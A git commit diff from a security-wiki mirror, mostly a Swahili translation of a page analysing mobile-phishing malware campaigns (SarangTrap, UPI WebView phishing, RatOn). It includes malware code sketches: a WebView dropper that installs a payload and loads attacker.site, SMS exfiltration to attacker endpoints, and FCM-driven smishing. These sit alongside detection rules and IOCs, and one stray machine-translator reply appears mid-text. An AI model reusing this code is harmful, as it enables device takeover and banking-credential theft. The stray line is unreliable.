mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Translated ['src/mobile-pentesting/android-app-pentesting/accessibility-
This commit is contained in:
parent
4da68715d1
commit
376bd639c4
@ -17,7 +17,7 @@ handler2.setLevel(logging.ERROR)
|
||||
logger.addHandler(handler2)
|
||||
|
||||
|
||||
def findtitle(search ,obj, key, path=(),):
|
||||
def findtitle(search, obj, key, path=()):
|
||||
# logger.debug(f"Looking for {search} in {path}")
|
||||
if isinstance(obj, dict) and key in obj and obj[key] == search:
|
||||
return obj, path
|
||||
@ -54,26 +54,42 @@ def ref(matchobj):
|
||||
if href.endswith("/"):
|
||||
href = href+"README.md" # Fix if ref points to a folder
|
||||
if "#" in href:
|
||||
chapter, _path = findtitle(href.split("#")[0], book, "source_path")
|
||||
title = " ".join(href.split("#")[1].split("-")).title()
|
||||
logger.debug(f'Ref has # using title: {title}')
|
||||
result = findtitle(href.split("#")[0], book, "source_path")
|
||||
if result is not None:
|
||||
chapter, _path = result
|
||||
title = " ".join(href.split("#")[1].split("-")).title()
|
||||
logger.debug(f'Ref has # using title: {title}')
|
||||
else:
|
||||
raise Exception(f"Chapter not found for path: {href.split('#')[0]}")
|
||||
else:
|
||||
chapter, _path = findtitle(href, book, "source_path")
|
||||
logger.debug(f'Recursive title search result: {chapter["name"]}')
|
||||
title = chapter['name']
|
||||
result = findtitle(href, book, "source_path")
|
||||
if result is not None:
|
||||
chapter, _path = result
|
||||
logger.debug(f'Recursive title search result: {chapter["name"]}')
|
||||
title = chapter['name']
|
||||
else:
|
||||
raise Exception(f"Chapter not found for path: {href}")
|
||||
except Exception as e:
|
||||
dir = path.dirname(current_chapter['source_path'])
|
||||
rel_path = path.normpath(path.join(dir,href))
|
||||
try:
|
||||
logger.debug(f'Not found chapter title from: {href} -- trying with relative path {rel_path}')
|
||||
if "#" in href:
|
||||
chapter, _path = findtitle(path.normpath(path.join(dir,href.split('#')[0])), book, "source_path")
|
||||
title = " ".join(href.split("#")[1].split("-")).title()
|
||||
logger.debug(f'Ref has # using title: {title}')
|
||||
result = findtitle(path.normpath(path.join(dir,href.split('#')[0])), book, "source_path")
|
||||
if result is not None:
|
||||
chapter, _path = result
|
||||
title = " ".join(href.split("#")[1].split("-")).title()
|
||||
logger.debug(f'Ref has # using title: {title}')
|
||||
else:
|
||||
raise Exception(f"Chapter not found for relative path: {path.normpath(path.join(dir,href.split('#')[0]))}")
|
||||
else:
|
||||
chapter, _path = findtitle(path.normpath(path.join(dir,href.split('#')[0])), book, "source_path")
|
||||
title = chapter["name"]
|
||||
logger.debug(f'Recursive title search result: {chapter["name"]}')
|
||||
result = findtitle(path.normpath(path.join(dir,href)), book, "source_path")
|
||||
if result is not None:
|
||||
chapter, _path = result
|
||||
title = chapter["name"]
|
||||
logger.debug(f'Recursive title search result: {chapter["name"]}')
|
||||
else:
|
||||
raise Exception(f"Chapter not found for relative path: {path.normpath(path.join(dir,href))}")
|
||||
except Exception as e:
|
||||
logger.debug(e)
|
||||
logger.error(f'Error getting chapter title: {rel_path}')
|
||||
|
@ -768,7 +768,7 @@
|
||||
- [Stack Shellcode - arm64](binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md)
|
||||
- [Stack Pivoting - EBP2Ret - EBP chaining](binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md)
|
||||
- [Uninitialized Variables](binary-exploitation/stack-overflow/uninitialized-variables.md)
|
||||
- [ROP and JOP](binary-exploitation/rop-return-oriented-programing/README.md)
|
||||
- [ROP & JOP](binary-exploitation/rop-return-oriented-programing/README.md)
|
||||
- [BROP - Blind Return Oriented Programming](binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md)
|
||||
- [Ret2csu](binary-exploitation/rop-return-oriented-programing/ret2csu.md)
|
||||
- [Ret2dlresolve](binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md)
|
||||
@ -837,8 +837,9 @@
|
||||
- [WWW2Exec - GOT/PLT](binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md)
|
||||
- [WWW2Exec - \_\_malloc_hook & \_\_free_hook](binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md)
|
||||
- [Common Exploiting Problems](binary-exploitation/common-exploiting-problems.md)
|
||||
- [Linux kernel exploitation - toctou](binary-exploitation/linux-kernel-exploitation/posix-cpu-timers-toctou-cve-2025-38352.md)
|
||||
- [Windows Exploiting (Basic Guide - OSCP lvl)](binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md)
|
||||
- [iOS Exploiting](binary-exploitation/ios-exploiting/README.md)
|
||||
- [iOS Exploiting](binary-exploitation/ios-exploiting.md)
|
||||
|
||||
# 🤖 AI
|
||||
- [AI Security](AI/README.md)
|
||||
|
@ -3,63 +3,63 @@
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
> [!INFO]
|
||||
> Ukurasa huu unashughulikia mbinu zinazotumiwa na wahalifu kusambaza **malicious Android APKs** na **iOS mobile-configuration profiles** kupitia phishing (SEO, uhandisi wa kijamii, maduka ya uwongo, programu za uchumba, n.k.).
|
||||
> Nyenzo hii imebadilishwa kutoka kwa kampeni ya SarangTrap iliyofichuliwa na Zimperium zLabs (2025) na utafiti mwingine wa umma.
|
||||
> Ukurasa huu unafunika mbinu zinazotumiwa na wahalifu kusambaza **malicious Android APKs** na **iOS mobile-configuration profiles** kupitia phishing (SEO, social engineering, fake stores, dating apps, n.k.).
|
||||
> Nyenzo imeanzishwa kutoka kwenye kampeni ya SarangTrap iliyofichuliwa na Zimperium zLabs (2025) na utafiti mwingine wa umma.
|
||||
|
||||
## Attack Flow
|
||||
## Mtiririko wa Shambulio
|
||||
|
||||
1. **SEO/Phishing Infrastructure**
|
||||
* Jisajili majina ya kikoa yanayofanana (uchumba, kushiriki wingu, huduma za magari…).
|
||||
– Tumia maneno muhimu ya lugha ya ndani na emojis katika kipengele cha `<title>` ili kuorodheshwa kwenye Google.
|
||||
– Weka *zote* maelekezo ya usakinishaji ya Android (`.apk`) na iOS kwenye ukurasa mmoja wa kutua.
|
||||
2. **First Stage Download**
|
||||
* Android: kiungo cha moja kwa moja kwa APK *isiyosainiwa* au “maduka ya wahusika wengine”.
|
||||
* iOS: `itms-services://` au kiungo cha HTTPS wazi kwa profaili ya **mobileconfig** mbaya (angalia hapa chini).
|
||||
3. **Post-install Social Engineering**
|
||||
* Katika matumizi ya kwanza, programu inahitaji **nambari ya mwaliko / uthibitisho** (dhana ya ufikiaji wa kipekee).
|
||||
* Nambari hiyo inatumwa **POST kupitia HTTP** kwa Command-and-Control (C2).
|
||||
* C2 inajibu `{"success":true}` ➜ malware inaendelea.
|
||||
* Uchambuzi wa dynamic wa Sandbox / AV ambao hauwasilishi nambari halali unaona **hakuna tabia mbaya** (kuepuka).
|
||||
4. **Runtime Permission Abuse** (Android)
|
||||
* Ruhusa hatari zinahitajiwa tu **baada ya majibu chanya kutoka C2**:
|
||||
* Jisajili kanda nyingi za domain zinazofanana (apps za dating, huduma za kushirikisha faili, huduma za gari…).
|
||||
– Tumia maneno muhimu ya lugha ya eneo na emojis katika elementi ya `<title>` ili kupata nafasi kwenye Google.
|
||||
– Weka maelekezo ya usakinishaji ya *both* Android (`.apk`) na iOS kwenye ukurasa mmoja wa kutua.
|
||||
2. **Kipindi cha Kwanza cha Upakuaji**
|
||||
* Android: kiungo moja kwa moja kwa APK isiyo *unsigned* au “third-party store”.
|
||||
* iOS: `itms-services://` au kiungo cha HTTPS cha kawaida kinaelekeza kwenye **mobileconfig** profile yenye uharibifu (tazama chini).
|
||||
3. **Baada ya usakinishaji: Social Engineering**
|
||||
* Wakati wa kwanza kuendesha, app inaomba **invitation / verification code** (udanganyifu wa ufikiaji wa kipekee).
|
||||
* Msimbo hutumwa kwa **POST** kupitia HTTP hadi Command-and-Control (C2).
|
||||
* C2 inarudisha `{"success":true}` ➜ malware inaendelea.
|
||||
* Sandbox / AV dynamic analysis ambazo hazitumi msimbo halali haziona **hakuna tabia hatarishi** (evasion).
|
||||
4. **Matumizi mabaya ya ruhusa za Runtime** (Android)
|
||||
* Ruhusa hatarishi zinaombwa tu **baada ya jibu chanya kutoka C2**:
|
||||
```xml
|
||||
<uses-permission android:name="android.permission.READ_CONTACTS"/>
|
||||
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
|
||||
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
|
||||
<!-- Mifano ya zamani pia ilihitaji ruhusa za SMS -->
|
||||
<!-- Older builds also asked for SMS permissions -->
|
||||
```
|
||||
* Mifano ya hivi karibuni **ondoa `<uses-permission>` kwa SMS kutoka `AndroidManifest.xml`** lakini inacha njia ya msimbo wa Java/Kotlin inayosoma SMS kupitia reflection ⇒ inapunguza alama ya static wakati bado inafanya kazi kwenye vifaa vinavyotoa ruhusa kupitia unyanyasaji wa `AppOps` au malengo ya zamani.
|
||||
* Toleo za hivi karibuni **zinaondoa `<uses-permission>` kwa SMS kutoka `AndroidManifest.xml`** lakini zinaacha njia ya Java/Kotlin inayosoma SMS kupitia reflection ⇒ inapunguza alama ya static wakati bado inafanya kazi kwenye vifaa vinavyotoa ruhusa kwa njia ya `AppOps` abuse au malengo ya zamani.
|
||||
5. **Facade UI & Background Collection**
|
||||
* Programu inaonyesha maoni yasiyo na madhara (mtazamaji wa SMS, mchaguo wa picha) iliyotekelezwa kwa ndani.
|
||||
* Wakati huo inachukua:
|
||||
- IMEI / IMSI, nambari ya simu
|
||||
- Dump kamili ya `ContactsContract` (array ya JSON)
|
||||
- JPEG/PNG kutoka `/sdcard/DCIM` iliyoshinikizwa na [Luban](https://github.com/Curzibn/Luban) ili kupunguza ukubwa
|
||||
- Maudhui ya SMS ya hiari (`content://sms`)
|
||||
Payloads ni **batch-zipped** na kutumwa kupitia `HTTP POST /upload.php`.
|
||||
6. **iOS Delivery Technique**
|
||||
* Profaili moja ya **mobile-configuration** inaweza kuomba `PayloadType=com.apple.sharedlicenses`, `com.apple.managedConfiguration` n.k. kujiandikisha kifaa katika usimamizi kama “MDM”.
|
||||
* Maagizo ya uhandisi wa kijamii:
|
||||
1. Fungua Mipangilio ➜ *Profaili imeshushwa*.
|
||||
2. Bonyeza *Sakinisha* mara tatu (picha za skrini kwenye ukurasa wa phishing).
|
||||
3. Amini profaili isiyosainiwa ➜ mshambuliaji anapata *Contacts* & *Photo* haki bila ukaguzi wa Duka la Programu.
|
||||
7. **Network Layer**
|
||||
* HTTP wazi, mara nyingi kwenye bandari 80 na kichwa cha HOST kama `api.<phishingdomain>.com`.
|
||||
* App inaonyesha muonekano usio hatari (SMS viewer, gallery picker) utekelezaji wa ndani.
|
||||
* Wakati huo huo hutuma data nje (exfiltrates):
|
||||
- IMEI / IMSI, namba ya simu
|
||||
- Full `ContactsContract` dump (JSON array)
|
||||
- JPEG/PNG kutoka `/sdcard/DCIM` zinasimbwa na [Luban](https://github.com/Curzibn/Luban) ili kupunguza ukubwa
|
||||
- Yenye chaguo la SMS content (`content://sms`)
|
||||
Payloads zinazipiwa kwa batch (batch-zipped) na kutumwa kupitia `HTTP POST /upload.php`.
|
||||
6. **Teknika ya Uwasilishaji ya iOS**
|
||||
* Profile moja ya **mobile-configuration profile** inaweza kuomba `PayloadType=com.apple.sharedlicenses`, `com.apple.managedConfiguration` n.k. ili kujiandikisha kifaa kwa usimamizi unaofanana na “MDM”.
|
||||
* Maelekezo ya social-engineering:
|
||||
1. Fungua Settings ➜ *Profile downloaded*.
|
||||
2. Bonyeza *Install* mara tatu (picha-skrini kwenye ukurasa wa phishing).
|
||||
3. Amini profile isiyo signed ➜ mshambulizi anapata ruhusa za *Contacts* & *Photo* bila kupitia ukaguzi wa App Store.
|
||||
7. **Tabaka la Mtandao**
|
||||
* Plain HTTP, mara nyingi kwenye port 80 na HOST header kama `api.<phishingdomain>.com`.
|
||||
* `User-Agent: Dalvik/2.1.0 (Linux; U; Android 13; Pixel 6 Build/TQ3A.230805.001)` (hakuna TLS → rahisi kugundua).
|
||||
|
||||
## Defensive Testing / Red-Team Tips
|
||||
|
||||
* **Dynamic Analysis Bypass** – Wakati wa tathmini ya malware, otomatisha awamu ya nambari ya mwaliko kwa Frida/Objection ili kufikia tawi la mbaya.
|
||||
* **Manifest vs. Runtime Diff** – Linganisha `aapt dump permissions` na `PackageManager#getRequestedPermissions()` wakati wa runtime; kukosekana kwa ruhusa hatari ni bendera nyekundu.
|
||||
* **Network Canary** – Sanidi `iptables -p tcp --dport 80 -j NFQUEUE` kugundua milipuko isiyo thabiti ya POST baada ya kuingiza nambari.
|
||||
* **mobileconfig Inspection** – Tumia `security cms -D -i profile.mobileconfig` kwenye macOS kuorodhesha `PayloadContent` na kugundua haki nyingi.
|
||||
* **Dynamic Analysis Bypass** – Wakati wa tathmini ya malware, otomatisha awamu ya invitation code kwa Frida/Objection ili kufikia tawi la uharibifu.
|
||||
* **Manifest vs. Runtime Diff** – Linganisha `aapt dump permissions` na runtime `PackageManager#getRequestedPermissions()`; kutokuwepo kwa ruhusa hatarishi ni ishara ya hatari.
|
||||
* **Network Canary** – Sanidi `iptables -p tcp --dport 80 -j NFQUEUE` kugundua POST bursts zisizo thabiti baada ya kuingiza msimbo.
|
||||
* **mobileconfig Inspection** – Tumia `security cms -D -i profile.mobileconfig` kwenye macOS ili orodhesha `PayloadContent` na kugundua entitlements za ziada.
|
||||
|
||||
## Blue-Team Detection Ideas
|
||||
|
||||
* **Certificate Transparency / DNS Analytics** ili kukamata milipuko ya ghafla ya majina ya kikoa yenye maneno muhimu.
|
||||
* **User-Agent & Path Regex**: `(?i)POST\s+/(check|upload)\.php` kutoka kwa wateja wa Dalvik nje ya Google Play.
|
||||
* **Invite-code Telemetry** – POST ya nambari za nambari za 6–8 mara tu baada ya usakinishaji wa APK inaweza kuashiria hatua ya maandalizi.
|
||||
* **MobileConfig Signing** – Zuia profaili za usanidi zisizosainiwa kupitia sera ya MDM.
|
||||
* **Certificate Transparency / DNS Analytics** ili kushika mfululizo wa ghafla wa domain zilizo na maneno muhimu.
|
||||
* **User-Agent & Path Regex**: `(?i)POST\s+/(check|upload)\.php` kutoka kwa Dalvik clients nje ya Google Play.
|
||||
* **Invite-code Telemetry** – POST ya nambari za tarakimu 6–8 mara baada ya usakinishaji wa APK inaweza kuashiria staging.
|
||||
* **MobileConfig Signing** – Zuia configuration profiles zisizosainiwa kupitia sera za MDM.
|
||||
|
||||
## Useful Frida Snippet: Auto-Bypass Invitation Code
|
||||
```python
|
||||
@ -80,7 +80,7 @@ return conn;
|
||||
};
|
||||
});
|
||||
```
|
||||
## Ishara (Kawaida)
|
||||
## Viashiria (Za Kawaida)
|
||||
```
|
||||
/req/checkCode.php # invite code validation
|
||||
/upload.php # batched ZIP exfiltration
|
||||
@ -90,28 +90,28 @@ LubanCompress 1.1.8 # "Luban" string inside classes.dex
|
||||
|
||||
## Android WebView Payment Phishing (UPI) – Dropper + FCM C2 Pattern
|
||||
|
||||
Mwelekeo huu umeonekana katika kampeni zinazotumia mada za manufaa ya serikali kuiba akidi za UPI za India na OTPs. Opereta wanachanganya majukwaa maarufu kwa ajili ya usambazaji na uimara.
|
||||
Mufumo huu umeonekana katika kampeni zinazotumia mandhari za faida za serikali ili kuiba vyeti vya UPI vya India na OTPs. Waendeshaji huunganisha majukwaa yenye sifa kwa ajili ya usambazaji na ustahimilivu.
|
||||
|
||||
### Mnyororo wa usambazaji kupitia majukwaa ya kuaminika
|
||||
- YouTube video lure → maelezo yana kiungo kifupi
|
||||
- Shortlink → GitHub Pages phishing site inayofanana na lango halali
|
||||
- Reposi hiyo hiyo ya GitHub inahifadhi APK yenye alama ya uongo ya “Google Play” inayounganisha moja kwa moja na faili
|
||||
- Kurasa za phishing za dynamic zinaishi kwenye Replit; channel ya amri ya mbali inatumia Firebase Cloud Messaging (FCM)
|
||||
### Mnyororo wa utoaji kupitia majukwaa yanayotegemewa
|
||||
- Video ya kuvutia kwenye YouTube → maelezo yana kiunganisho kifupi
|
||||
- Kiunganisho kifupi → tovuti ya phishing kwenye GitHub Pages inayoiga portal halali
|
||||
- Repo hiyo ya GitHub inahifadhi APK yenye beji bandia “Google Play” inayounganisha moja kwa moja kwenye faili
|
||||
- Kurasa za phishing zinazobadilika zinahifadhiwa kwenye Replit; chaneli ya amri za mbali inatumia Firebase Cloud Messaging (FCM)
|
||||
|
||||
### Dropper yenye payload iliyojumuishwa na usakinishaji wa offline
|
||||
- APK ya kwanza ni installer (dropper) inayosafirisha malware halisi kwenye `assets/app.apk` na inamwambia mtumiaji kuzima Wi‑Fi/data ya simu ili kupunguza ugunduzi wa wingu.
|
||||
- Payload iliyojumuishwa inasakinishwa chini ya jina lisilo na hatari (mfano, “Secure Update”). Baada ya usakinishaji, installer na payload zote zinapatikana kama programu tofauti.
|
||||
### Dropper with embedded payload and offline install
|
||||
- APK ya kwanza ni msakinishaji (dropper) anayesafirisha malware halisi katika `assets/app.apk` na kuhimiza mtumiaji kuzima Wi‑Fi/data ya simu ili kupunguza utambuzi wa cloud.
|
||||
- Embedded payload inasakinishwa chini ya lebo isiyoonekana tishio (kwa mfano, “Secure Update”). Baada ya usakinishaji, msakinishaji na payload wote hubaki kama apps tofauti.
|
||||
|
||||
Static triage tip (grep for embedded payloads):
|
||||
Vidokezo vya triage ya static (grep for embedded payloads):
|
||||
```bash
|
||||
unzip -l sample.apk | grep -i "assets/app.apk"
|
||||
# Or:
|
||||
zipgrep -i "classes|.apk" sample.apk | head
|
||||
```
|
||||
### Ugunduzi wa mwisho wa dinamik kupitia kiungo kifupi
|
||||
- Malware inapata orodha ya maandiko ya maandiko, iliyotenganishwa kwa koma ya mwisho hai kutoka kwa kiungo kifupi; mabadiliko rahisi ya maandiko yanazalisha njia ya mwisho ya ukurasa wa phishing.
|
||||
### Ugunduzi wa endpoints kwa njia ya shortlink
|
||||
- Malware inachukua orodha ya plain-text, comma-separated ya live endpoints kutoka shortlink; simple string transforms hutengeneza final phishing page path.
|
||||
|
||||
Mfano (iliyosafishwa):
|
||||
Mfano (safishwa):
|
||||
```
|
||||
GET https://rebrand.ly/dclinkto2
|
||||
Response: https://sqcepo.replit.app/gate.html,https://sqcepo.replit.app/addsm.php
|
||||
@ -119,7 +119,7 @@ Transform: "gate.html" → "gate.htm" (loaded in WebView)
|
||||
UPI credential POST: https://sqcepo.replit.app/addup.php
|
||||
SMS upload: https://sqcepo.replit.app/addsm.php
|
||||
```
|
||||
Pseudo-code:
|
||||
Msimbo wa mfano (pseudo-code):
|
||||
```java
|
||||
String csv = httpGet(shortlink);
|
||||
String[] parts = csv.split(",");
|
||||
@ -128,7 +128,7 @@ String smsPost = parts[1];
|
||||
String credsPost = upiPage.replace("gate.htm", "addup.php");
|
||||
```
|
||||
### WebView-based UPI credential harvesting
|
||||
- Hatua ya “Fanya malipo ya ₹1 / UPI‑Lite” inachukua fomu ya HTML ya mshambuliaji kutoka kwa kiunganishi cha dinamik ndani ya WebView na inakamata maeneo nyeti (simu, benki, UPI PIN) ambayo yanatumwa kwa `POST` kwa `addup.php`.
|
||||
- Hatua ya “Make payment of ₹1 / UPI‑Lite” inapakia fomu ya HTML ya mshambulizi kutoka kwa endpoint ya dinamiki ndani ya WebView na inakusanya viwanja nyeti (nambari ya simu, benki, UPI PIN) ambavyo vinatumwa kwa `POST` kwenda `addup.php`.
|
||||
|
||||
Minimal loader:
|
||||
```java
|
||||
@ -136,18 +136,18 @@ WebView wv = findViewById(R.id.web);
|
||||
wv.getSettings().setJavaScriptEnabled(true);
|
||||
wv.loadUrl(upiPage); // ex: https://<replit-app>/gate.htm
|
||||
```
|
||||
### Kujitangaza na kukamata SMS/OTP
|
||||
- Ruhusa za nguvu zinahitajika kwenye matumizi ya kwanza:
|
||||
### Kujieneza mwenyewe na kukamata SMS/OTP
|
||||
- Ruhusa kali zinaombwa mara ya kwanza kuendeshwa:
|
||||
```xml
|
||||
<uses-permission android:name="android.permission.READ_CONTACTS"/>
|
||||
<uses-permission android:name="android.permission.SEND_SMS"/>
|
||||
<uses-permission android:name="android.permission.READ_SMS"/>
|
||||
<uses-permission android:name="android.permission.CALL_PHONE"/>
|
||||
```
|
||||
- Mawasiliano yanapigwa ili kutuma ujumbe wa smishing kwa wingi kutoka kwa kifaa cha mwathirika.
|
||||
- SMS zinazokuja zinakamatwa na mpokeaji wa matangazo na kupakiwa na metadata (mjumbe, mwili, sloti ya SIM, kitambulisho cha nasibu cha kifaa) hadi `/addsm.php`.
|
||||
- Mawasiliano huwekwa katika mzunguko ili kutuma kwa wingi smishing SMS kutoka kwenye kifaa cha mwathiriwa.
|
||||
- SMS zinazoingia zinakamatwa na broadcast receiver na zinapakiwa zikiwa na metadata (sender, body, SIM slot, per-device random ID) kwenye `/addsm.php`.
|
||||
|
||||
Receiver sketch:
|
||||
Mchoro wa receiver:
|
||||
```java
|
||||
public void onReceive(Context c, Intent i){
|
||||
SmsMessage[] msgs = Telephony.Sms.Intents.getMessagesFromIntent(i);
|
||||
@ -161,8 +161,8 @@ postForm(urlAddSms, new FormBody.Builder()
|
||||
}
|
||||
}
|
||||
```
|
||||
### Firebase Cloud Messaging (FCM) kama C2 yenye uvumilivu
|
||||
- Payload inajiandikisha kwa FCM; ujumbe wa kusukuma hubeba uwanja wa `_type` unaotumika kama swichi kuanzisha vitendo (mfano, sasisha mifano ya maandiko ya ulaghai, badilisha tabia).
|
||||
### Firebase Cloud Messaging (FCM) kama C2 inayostahimili
|
||||
- Payload inasajiliwa kwa FCM; ujumbe za push zina sehemu `_type` inayotumika kama switch kuchochea vitendo (mfano: kusasisha kiolezo za maandishi za phishing, kuwasha/kuzima tabia).
|
||||
|
||||
Mfano wa payload ya FCM:
|
||||
```json
|
||||
@ -174,7 +174,7 @@ Mfano wa payload ya FCM:
|
||||
}
|
||||
}
|
||||
```
|
||||
Mchoro wa mpangilio:
|
||||
Handler rasimu:
|
||||
```java
|
||||
@Override
|
||||
public void onMessageReceived(RemoteMessage msg){
|
||||
@ -186,27 +186,177 @@ case "smish": sendSmishToContacts(); break;
|
||||
}
|
||||
}
|
||||
```
|
||||
### Hunting patterns and IOCs
|
||||
- APK ina payload ya pili kwenye `assets/app.apk`
|
||||
- WebView inachukua malipo kutoka `gate.htm` na kuhamasisha kwa `/addup.php`
|
||||
- Uhamasishaji wa SMS kwa `/addsm.php`
|
||||
- Upataji wa config unaoendeshwa na shortlink (mfano, `rebrand.ly/*`) ukirudisha mwisho wa CSV
|
||||
- Apps zilizoandikwa kama "Update/Secure Update" za kawaida
|
||||
- FCM `data` ujumbe wenye mtabo wa `_type` katika apps zisizoaminika
|
||||
### Mifumo ya uwindaji na IOCs
|
||||
- APK ina secondary payload kwenye `assets/app.apk`
|
||||
- WebView inapakia payment kutoka `gate.htm` na inatoa data kwa `/addup.php`
|
||||
- SMS exfiltration kwa `/addsm.php`
|
||||
- Shortlink-driven config fetch (e.g., `rebrand.ly/*`) inayorejesha CSV endpoints
|
||||
- Apps zenye lebo ya generic “Update/Secure Update”
|
||||
- Ujumbe za FCM `data` zenye `_type` discriminator katika apps zisizo za kuaminika
|
||||
|
||||
### Detection & defence ideas
|
||||
- Flag apps ambazo zinaelekeza watumiaji kuzima mtandao wakati wa usakinishaji na kisha kuhamasisha APK ya pili kutoka `assets/`.
|
||||
- Onya kuhusu tuple ya ruhusa: `READ_CONTACTS` + `READ_SMS` + `SEND_SMS` + michakato ya malipo ya WebView.
|
||||
- Ufuatiliaji wa egress kwa `POST /addup.php|/addsm.php` kwenye mwenyeji wasio wa kampuni; zuia miundombinu inayojulikana.
|
||||
- Kanuni za Mobile EDR: app isiyoaminika inajiandikisha kwa FCM na kujiunga kwenye uwanja wa `_type`.
|
||||
### Mapendekezo ya utambuzi na ulinzi
|
||||
- Wezesha alama kwa apps zinazowaelekeza watumiaji kuzima network wakati wa ufungaji kisha side-load APK ya pili kutoka `assets/`.
|
||||
- Toa onyo kwa tuple ya ruhusa: `READ_CONTACTS` + `READ_SMS` + `SEND_SMS` + WebView-based payment flows.
|
||||
- Ufuatiliaji wa egress kwa `POST /addup.php|/addsm.php` kwenye hosts zisizo za corporate; zuia infrastructure inayojulikana.
|
||||
- Sheria za Mobile EDR: app isiyo ya kuaminika inayosajiliwa kwa FCM na kuingia kwenye tawi kulingana na `_type` field.
|
||||
|
||||
---
|
||||
|
||||
## Android Accessibility/Overlay & Device Admin Abuse, ATS automation, and NFC relay orchestration – RatOn case study
|
||||
|
||||
Kampeni ya RatOn banker/RAT (ThreatFabric) ni mfano halisi wa jinsi operesheni za kisasa za mobile phishing zinavyochanganya WebView droppers, Accessibility-driven UI automation, overlays/ransom, Device Admin coercion, Automated Transfer System (ATS), crypto wallet takeover, na hata NFC-relay orchestration. Sehemu hii inatoa muhtasari wa mbinu zinazoweza kurudiwa.
|
||||
|
||||
### Stage-1: WebView → native install bridge (dropper)
|
||||
Wavamizi wanaonyesha WebView inayorejea kwenye ukurasa wa mshambuliaji na kuingiza JavaScript interface inayofichua native installer. Kugusa kitufe cha HTML kunaita native code ambayo inasakinisha APK ya awamu ya pili iliyojumuishwa katika assets za dropper kisha kuiendesha moja kwa moja.
|
||||
|
||||
Mfano mdogo:
|
||||
```java
|
||||
public class DropperActivity extends Activity {
|
||||
@Override protected void onCreate(Bundle b){
|
||||
super.onCreate(b);
|
||||
WebView wv = new WebView(this);
|
||||
wv.getSettings().setJavaScriptEnabled(true);
|
||||
wv.addJavascriptInterface(new Object(){
|
||||
@android.webkit.JavascriptInterface
|
||||
public void installApk(){
|
||||
try {
|
||||
PackageInstaller pi = getPackageManager().getPackageInstaller();
|
||||
PackageInstaller.SessionParams p = new PackageInstaller.SessionParams(PackageInstaller.SessionParams.MODE_FULL_INSTALL);
|
||||
int id = pi.createSession(p);
|
||||
try (PackageInstaller.Session s = pi.openSession(id);
|
||||
InputStream in = getAssets().open("payload.apk");
|
||||
OutputStream out = s.openWrite("base.apk", 0, -1)){
|
||||
byte[] buf = new byte[8192]; int r; while((r=in.read(buf))>0){ out.write(buf,0,r);} s.fsync(out);
|
||||
}
|
||||
PendingIntent status = PendingIntent.getBroadcast(this, 0, new Intent("com.evil.INSTALL_DONE"), PendingIntent.FLAG_UPDATE_CURRENT | PendingIntent.FLAG_IMMUTABLE);
|
||||
pi.commit(id, status.getIntentSender());
|
||||
} catch (Exception e) { /* log */ }
|
||||
}
|
||||
}, "bridge");
|
||||
setContentView(wv);
|
||||
wv.loadUrl("https://attacker.site/install.html");
|
||||
}
|
||||
}
|
||||
```
|
||||
Tafadhali weka hapa HTML au yaliyomo ya ukurasa unayotaka nitoe tafsiri. Nitatafsiri maandishi ya Kiingereza muhimu kwa Kiswahili na nitaacha bilioni za code, tags, links, refs, paths na majina ya huduma zisibadilishwe kama ulivyosema.
|
||||
```html
|
||||
<button onclick="bridge.installApk()">Install</button>
|
||||
```
|
||||
Baada ya kusakinishwa, dropper huanzisha payload kupitia explicit package/activity:
|
||||
```java
|
||||
Intent i = new Intent();
|
||||
i.setClassName("com.stage2.core", "com.stage2.core.MainActivity");
|
||||
startActivity(i);
|
||||
```
|
||||
Wazo la kuwinda: maombi yasiyotegemewa yanayoita `addJavascriptInterface()` na kufichua installer-like methods kwa WebView; APK ikisafirisha embedded secondary payload chini ya `assets/` na kuita Package Installer Session API.
|
||||
|
||||
### Mfereji wa idhini: Accessibility + Device Admin + maombi ya runtime yanayofuata
|
||||
Stage-2 hufungua WebView inayoweka ukurasa wa “Access”. Kitufe chake kinaita exported method ambayo inaelekeza mwenye madhara kwenye mipangilio ya Accessibility na kuomba kuwezesha rogue service. Mara inapopewa, malware hutumia Accessibility kubonyeza kiotomatiki kupitia dialog za ruhusa za runtime zinazofuata (contacts, overlay, manage system settings, n.k.) na kuomba Device Admin.
|
||||
|
||||
- Accessibility kwa programu husaidia kukubali maombi ya baadaye kwa kutafuta vitufe kama “Allow”/“OK” kwenye node-tree na kutekeleza bonyeza.
|
||||
- Uhakiki/ombi la ruhusa ya overlay:
|
||||
```java
|
||||
if (!Settings.canDrawOverlays(ctx)) {
|
||||
Intent i = new Intent(Settings.ACTION_MANAGE_OVERLAY_PERMISSION,
|
||||
Uri.parse("package:" + ctx.getPackageName()));
|
||||
ctx.startActivity(i);
|
||||
}
|
||||
```
|
||||
Angalia pia:
|
||||
|
||||
{{#ref}}
|
||||
../../mobile-pentesting/android-app-pentesting/accessibility-services-abuse.md
|
||||
{{#endref}}
|
||||
|
||||
### Overlay phishing/ransom via WebView
|
||||
Operators wanaweza kutoa amri za kufanya:
|
||||
- kuonyesha overlay ya skrini nzima kutoka kwa URL, au
|
||||
- kupitisha inline HTML inayopakiwa ndani ya overlay ya WebView.
|
||||
|
||||
Matumizi yanayoweza: kulazimisha (kuingiza PIN), kufungua wallet ili kunasa PINs, ujumbe wa fidia. Weka amri ili kuhakikisha ruhusa ya overlay imetolewa kama haipo.
|
||||
|
||||
### Remote control model – text pseudo-screen + screen-cast
|
||||
- Low-bandwidth: mara kwa mara toa dump ya Accessibility node tree, serialize maandishi/roles/bounds yanayoonekana na uyatumie kwa C2 kama pseudo-screen (amri kama `txt_screen` mara moja na `screen_live` kuendelea).
|
||||
- High-fidelity: omesha MediaProjection na anzisha screen-casting/recording kwa mahitaji (amri kama `display` / `record`).
|
||||
|
||||
### ATS playbook (bank app automation)
|
||||
Kutolewa kazi ya JSON, fungua app ya banki, endesha UI kupitia Accessibility kwa mchanganyiko wa maswali ya maandishi na kugusa kwa kuratibu, na ingiza PIN ya malipo ya mhasiriwa wakati unapofikiwa kuomba.
|
||||
|
||||
Mfano wa kazi:
|
||||
```json
|
||||
